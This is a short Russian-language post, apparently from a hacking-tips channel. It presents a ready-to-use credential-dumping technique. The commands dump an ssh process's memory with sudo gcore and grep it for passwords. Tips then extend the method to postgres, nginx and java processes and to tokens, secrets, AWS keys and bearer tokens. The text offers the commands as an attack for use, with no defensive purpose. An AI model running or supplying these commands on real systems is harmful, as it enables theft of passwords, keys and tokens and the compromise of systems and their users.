Иногда у вас есть доступ к sudo, но нет полноценного рута. В таких случаях можно попробовать вытащить секреты прямо из памяти процесса:
pidof ssh && sudo gcore -o dump $(pidof ssh)
strings dump.* | grep -i password
➡️
pidof ssh — получаем PID целевого процесса➡️
sudo gcore -o dump — снимаем дамп памяти➡️
strings ... | grep — вытаскиваем строки с паролями💡 Можно найти: пароли, токены, ключи, строки подключения к базам и конфиденциальные переменные.
⚡ Лайфхаки:
— Меняй ssh на любой процесс, где потенциально может быть секрет (например, postgres, nginx, java)
— Можно заменить grep -i password на grep -Ei 'token|secret|aws|bearer'
— Работает без установки дополнительных утилит, только sudo и gcore (есть в gdb)
🐸 Библиотека хакера
#буст